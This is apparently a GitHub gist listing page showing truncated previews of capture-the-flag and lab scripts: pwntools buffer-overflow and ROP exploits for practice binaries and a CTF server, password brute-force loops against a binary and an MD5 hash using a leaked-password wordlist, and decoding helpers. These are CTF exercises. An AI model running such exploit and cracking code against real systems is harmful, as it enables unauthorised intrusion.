Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var cryptojs = require("crypto-js"); | |
var axios = require("axios"); | |
var cheerio = require("cheerio"); | |
var readline = require("readline"); | |
function decrypt(data) { | |
const key = cryptojs.enc.Hex.parse("0123456789abcdef0123456789abcdef"); | |
const iv = cryptojs.enc.Hex.parse("abcdef9876543210abcdef9876543210"); | |
const bytes = cryptojs.AES.decrypt({ciphertext: cryptojs.enc.Base64.parse(data)}, key, {iv: iv}); | |
return console.log(bytes.toString(cryptojs.enc.Utf8)); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# encode | |
[convert]::ToBase64String((Get-Content ".\test.exe" -Encoding Byte)) > test.txt | |
# decode | |
$file = Get-Content ".\test.txt" -Encoding UTF8 | |
[io.file]::WriteAllBytes("name.file", [convert]::FromBase64String($file)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# crunch 6 6 -t P8%%%% -o words.txt | |
function main() { | |
for i in $(cat ./words.txt); do | |
res=$(echo $i | ./download.elf) | |
echo $res | |
correct=$(echo $i | ./download.elf | cut -f3 -d ' ') | |
if [[ "$correct" == "Correct" ]]; then | |
echo "Password found: $i" | |
break | |
fi |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
made by sharpicx @ sharpicx.eu.org | |
*/ | |
var https = require("https"); | |
var axios = require("axios"); | |
var cryptoJS = require("crypto-js"); | |
const url = "https://autobot.htr/details.php"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# intended path | |
from pwn import * | |
context(arch='amd64', os='linux', log_level='DEBUG') | |
e = ELF('./split') | |
p = process(e.path) | |
pop_rdi = p64(0x00000000004007c3) | |
offset = 40 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
context(arch='amd64', os='linux', log_level='DEBUG') | |
e = ELF('./ret2win') | |
p = process(e.path) | |
offset = 40 | |
payload = b'' | |
payload += b'A' * offset | |
payload += p64(0x0000000000400764) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# the actual encrypt.py is from the hackthebox machine. | |
import binascii | |
def superDecrypt(hexVal, keyVal): | |
keyPos = 0 | |
key = makeList(keyVal) | |
decrypted = [] | |
for i in range(0, len(hexVal), 2): | |
byte = hexVal[i:i+2] | |
decrypted.append(chr(int(byte, 16) ^ ord(key[keyPos]))) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# 0xh3rshel taught me about this challenge, thanks! | |
from pwn import * | |
context(arch="amd64", os='linux', log_level="DEBUG") | |
e = ELF("./chall", checksec=True) | |
rop = ROP(e) | |
p = e.process() | |
r = remote("stembactf.space", 5204) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /bin/bash | |
wordlist="/opt/seclists/Passwords/Leaked-Databases/rockyou.txt" | |
while IFS= read -r line; do | |
hash=$(echo $line | md5sum | awk '{print $1}') | |
if [[ "$hash" == d51540* ]]; then | |
echo "plain: $line" | |
echo "hash: $hash" | |
fi |